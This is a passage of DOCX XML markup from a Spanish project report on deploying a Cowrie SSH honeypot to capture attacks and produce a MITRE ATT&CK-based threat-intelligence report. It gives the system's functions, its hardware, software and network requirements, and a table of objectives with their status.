                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gratuito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Unos 15 € en total por el cambio de proveedor (véase el Presupuesto).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 3. Evolución del proyecto respecto al anteproyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Funciones Principales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El sistema desarrollado cumple las siguientes funciones:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Simular un servidor SSH vulnerable accesible desde Internet para atraer ataques automatizados de forma segura, sin exponer infraestructura de producción.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrar de forma detallada cada intento de acceso: IPs de origen, credenciales probadas, timestamps, comandos ejecutados tras el acceso y ficheros descargados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Analizar los datos capturados de forma automatizada mediante un script Python que genera estadísticas, rankings y gráficas exportables en formato PNG.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Geolocalizar las IPs atacantes para determinar la distribución geográfica de las fuentes de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Clasificar la actividad observada según el marco MITRE ATT&amp;CK, proporcionando un informe de inteligencia accionable con recomendaciones defensivas concretas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Opcionalmente, integrar los logs con un SIEM (Wazuh) para su visualización en dashboard y la configuración de alertas en tiempo real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Requisitos del Sistema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Para la ejecución completa del proyecto se requiere:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Requisitos Hardware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Servidor cloud con al menos 1 vCPU y 1 GB de RAM (en este proyecto se utiliza un servidor CX23 de Hetzner Cloud con 2 vCPU x86 y 4 GB de RAM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirección IP pública accesible desde Internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Equipo local con capacidad de virtualización para ejecutar Wazuh y Kali Linux (mínimo 8 GB de RAM total en el host).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Requisitos Software</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuenta en un proveedor cloud con servidores Linux e IP pública (en este proyecto, Hetzner Cloud).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu Server 24.04 LTS como sistema operativo del servidor cloud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSH configurado con autenticación por clave pública ed25519.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie 3.1.0, instalado desde PyPI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3.10 o superior con las bibliotecas json, collections, matplotlib y requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox 7.x como hipervisor local para las máquinas virtuales de laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh 4.9.2 instalado en máquina virtual local (componente opcional).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux (última versión rolling) para pruebas de ataque controlado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Git para el control de versiones del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Requisitos de Red</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conexión a Internet permanente en el servidor cloud para la exposición del honeypot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Puertos 22 (honeypot) y 2022 (SSH real) accesibles desde Internet a través del firewall del proveedor (Cloud Firewall de Hetzner).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Acceso a la API de ip-api.com para la geolocalización de IPs atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conectividad SSH (puerto 2022) entre el laboratorio local y el servidor cloud para la descarga de logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo General</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Desplegar y operar un honeypot SSH expuesto a Internet que capture ataques reales durante al menos tres semanas, y transformar esos datos en un informe de inteligencia de amenazas con la actividad clasificada según MITRE ATT&amp;CK y recomendaciones defensivas aplicables a cualquier servidor Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivos Específicos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cada objetivo específico se acompaña de un indicador verificable y de su estado a fecha de esta entrega (8 de octubre de 2026):</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37"/>
        <w:gridCol w:w="3413"/>
        <w:gridCol w:w="1588"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Objetivo específico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2150"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Indicador de cumplimiento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Estado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OE1. Desplegar un servidor cloud bastionado cuyo acceso de administración no pueda comprometerse por fuerza bruta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2150"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Escaneo externo con solo los puertos 22 y 2022 visibles; acceso como root y con contraseña rechazados en el 2022.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cumplido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OE2. Instalar Cowrie con una identidad verosímil y registrar toda la actividad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2150"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap identifica el puerto 22 como OpenSSH de Debian 12; los atacantes ejecutan comandos; cada evento queda en cowrie.json.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cumplido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OE3. Automatizar el despliegue para que sea reproducible en cualquier proveedor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2150"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
